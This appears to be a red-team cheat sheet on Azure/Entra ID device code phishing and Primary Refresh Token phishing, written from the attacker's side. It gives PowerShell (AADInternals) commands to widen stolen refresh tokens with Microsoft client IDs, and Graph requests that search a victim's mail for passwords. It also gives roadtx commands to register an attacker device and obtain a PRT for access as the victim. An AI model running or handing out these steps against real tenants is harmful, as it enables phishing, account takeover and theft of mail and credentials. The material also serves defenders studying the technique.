Azure Device Code Phishing

Device code phishing

It relies on a legitimate authentication endpoint that is capable of forwarding the user session token to an attacker. It uses the OAuth 2 Device Code Flow. Device authorization grant is intended for use with input-constrained devices (e.g. smart TV, printers)

  • The attacker generates a code from EntraID /devicecode endpoint. This code is valid for only 15 minutes.
  • The attacker sends the device code to the victim in a phishing email.
  • The victim opens the legitimate website and only need to provide the code.
  • The attacker obtains a valid access token (60 minutes) and a refresh token (90 days) from the victim user to a specific client/application (e.g. Teams, Outlook, SharePoint, etc.).


A device code can be requested through the following endpoint:

The JWT token obtained has a limited scope. Use the refresh token to extend the scope by requesting access to other O365 applications using the well-known application GUID. We simply need to extend the scope to include applications that has the right to query Graph APIs.

Open a PowerShell console:

import-module addinternals
$t = Get-AADIntAccessTokenWithRefreshToken -clientid "d3590ed6-52b3-4102-aeff-aad2292ab01c" -resource "" -tenantid "" -refreshtoken "<token>" -savetocache 1 -includerefreshtoken 1
Write-Output $t

The client ID is the one from the O365 application to access. Find list of application IDs:

GET /v1.0/applications HTTP/2
Host: /
Authorization: Bearer <token>
Microsoft 365 client applicationClient ID
Teams desktop, mobile1fec8e78-bce4-4aaf-ab1b-5451cc387264
Teams web5e3ce6c0-2b1f-4285-8d4b-75ee78787346
Microsoft 365 web4765445b-32c6-49b0-83e6-1d93765276ca
Microsoft 365 desktop0ec893e0-5785-4de6-99da-4ed124e5296c
Microsoft 365 mobiled3590ed6-52b3-4102-aeff-aad2292ab01c
Outlook desktopd3590ed6-52b3-4102-aeff-aad2292ab01c
Outlook webbc59ab01-8403-45c6-8796-ac3ef710b3e3
Outlook mobile27922004-5251-4030-b22d-91ecd9a37ea4
Applications exposed by default within the Azure tenant

The newly extended token gives access to this:

GET /v1.0/me HTTP/2
Host: /
Authorization: Bearer <new token>

Read emails remotely:

GET /v1.0/me/messages?$search="body:password" HTTP/2
Host: /
Authorization: Bearer <new token>

See also this MsGraphFunzy (GitHub, Charles Hamilton) to dump emails through Microsoft Graph API. The output is an HTML report with all extracted information including the email attachments.

python3 azure.token body:password

Dynamic device code phishing

Same as the device code phishing, but bypasses the 15 minutes limitation by using a web page with JavaScript or a QR code in the email to display the device code.

Primary Refresh Token (PRT) phishing

Primary Refresh Token (PRT) is similar to TGT in Kerberos. It is a long-lived refresh token used for SSO and joined/registered/hybrid-joined devices. Valid for 14 days. Based on OAuth. Links a user identity to a device identity.

Device code phishing with clientID for Microsoft Authentication Broker.


Use roadtx (GitHub).

git clone
cd roadtools/
python3 -m venv /home/kali/roadtools/.venv

/home/kali/roadtools/.venv/bin/pip install -e roadlib/
/home/kali/roadtools/.venv/bin/pip install -e roadtx/
/home/kali/roadtools/.venv/bin/pip install setuptools

# Run roadtx
export PATH="$PATH:/home/kali/roadtools/.venv/bin"

# Help
roadtx gettokens --help

Will output a device code.

roadtx gettokens -c <client-id> -r --device-code

Keep roadtx running. The victim goes to and enters the device code (from roadtx) provided in phishing email. roadtx will receive the tokens (access token + refresh token) and write them to a file “.roadtools_auth”.

cat .roadtools_auth

Use refresh token to Device Registration token

roadtx refreshtokento -r drs

Register the attacker’s device. Generates “<device name>.key” and “<device name>.pem”.

roadtx device -a register -n hackerlaptop

Obtain the Primary Refresh Token (PRT) to access all applications that the user has access to. Will output the PRT token and save PRT to file “roadtx.prt”.

roadtx prt --refresh-token file -c hackerlaptop.pem -k hackerlaptop.key

Can now use roadtx and Selenium to access all apps (e.g. Outlook, Teams, Azure Portal, etc.) with the PRT as the victim.


roadtx gettokens -u username -p password